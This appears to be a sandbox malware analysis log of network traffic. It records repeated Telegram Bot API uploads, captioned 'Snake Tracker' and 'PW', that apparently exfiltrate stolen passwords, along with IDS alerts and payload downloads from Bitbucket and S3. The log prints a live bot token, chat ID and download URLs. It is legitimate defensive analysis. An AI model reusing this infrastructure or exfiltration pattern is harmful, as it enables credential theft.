          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2032ce18b5a9Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2056fe5a93edHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2049c4599bf0Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2101f28456d5Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd206c71d33baeHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd205f4e93af8aHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd211ac1c4f774Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2081d1ada311Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20761e459beaHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21322c4586e7Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2098731e7d87Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd208e2eaa00deHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20af00185e1eHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd214ffb664a86Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20a77e51f755Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20c4261497b1Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd216ef987af00Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20be100b0715Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20d938fe0172Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd218ddbcb8c7bHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20d7324cb693Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20ef893a5471Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21b3074f62f3Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20ed9b305c5dHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd210716015f06Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21d585647a82Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd210a7f89af93Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2125107c93fbHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21fe3ea779eeHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd212895f468d0Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2140552249deHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd222e6a7585d6Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd214541f09a2eHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd225faa7b54ceHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2161f5499881Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21699b4eabd7Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd229ac9c02cfeHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd218608facd63Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2189f0cb04caHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22de6d3ef3c7Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21a9f558bff4Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21acbc242eedHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2321d33b2b75Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21d05113ef78Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21cf699ce188Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23627ca5d7a5Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21f3fd82474bHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd221a131b77faHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23a7e0c358b1Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21f715d5f928Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2228c5d66eadHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd224dea6ac3fcHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2410d566cb44Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2253ee1debebHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd227b407d5dfdHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2470cc4c7c4cHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd228686aed571Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22ac30a66dbfHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24f09b604f03Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22c3003a5e58Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22efb27445d5Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2587cc98b653Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22ff41348b47Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd232b76f6085eHost: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd26047d4600f9Host: api.telegram.orgContent-Length: 535
          Source: global trafficHTTP traffic detected: POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2347cf9f5e67Host: api.telegram.orgContent-Length: 535
          Source: Joe Sandbox View | IP Address: 149.154.167.220
          Source: Joe Sandbox View | IP Address: 185.166.143.49
          Source: Joe Sandbox View | IP Address: 132.226.247.73
          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: unknown | DNS query: name: checkip.dyndns.org
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 52.217.32.148:443
          Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 185.166.143.49:443
          Source: global traffic | HTTP traffic detected: GET /ntim1478/gpmaw/downloads/202_Cneehezxuzj HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: bitbucket.org
          Source: global trafficHTTP traffic detected: GET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNEALCMKKZ&Signature=5HNNyrRhI17TtxEvBhRXBlIjzcE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIHzBvFwyiabwJo1RlEoXCuvYHlAj6GVUZcZJKMBSK6ENAiEA3lwDPyl2LnkI6qpuGfjEQS9N8qqF9JEL2NUziGWNIn8qpwIIYBAAGgw5ODQ1MjUxMDExNDYiDDj%2BrSjdv5z1DIwKsiqEApJ6u4jhBQd6j%2F999%2FKkXtAvgpY37KiSNSwzYxBC8wGz1X3uO0OlC3WWJ5HAblmMn89zpI6f9%2BRlrc7sEdixhZASuJjFVAm0rJDVe%2BcMUyRk%2FduiqyuXya%2BU7xCgRBhsKNelgYsfCR%2FexdjG4q1vGkc8XCMvlYKeYOdtMKIRlFzLXsXEh8MrIP8O90zcOf2tzV0xktzXWNPU1azrGxRsSRJXq35xOUz0%2FJR%2FQfN0mW9QaJrOxnrli3WFJajfSk9OFZwIhVZ8aqEv%2FHqW4txt8CUPEz8sZ1QR29gsSzQcgvThmwSrYgPJSR2%2BdgVltAF%2F17Esh33PZq4j1bIpUHdeXcONqWL9MJ3Ji7sGOp0BjViqRpDV2XSIOnqCOIjo564QwrPkJGWVJI%2B7Qg%2BAmAfIYrTa4QwMXzoydc9fWDEBwHeXx4VGraN4rvN9o4uGCAK98mQ8Io30CJ2mll5bGrmu1Y%2B9SoBV38pLHiwvgAzvv3NdmAsCcGRS%2Fvc9QAw7npYb9JKojViWZN33%2FPyasPn%2FGYHRVXxtJTebEdkz7iFZfvYPbjkmr4Agj%2FIHWA%3D%3D&Expires=1734536101 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
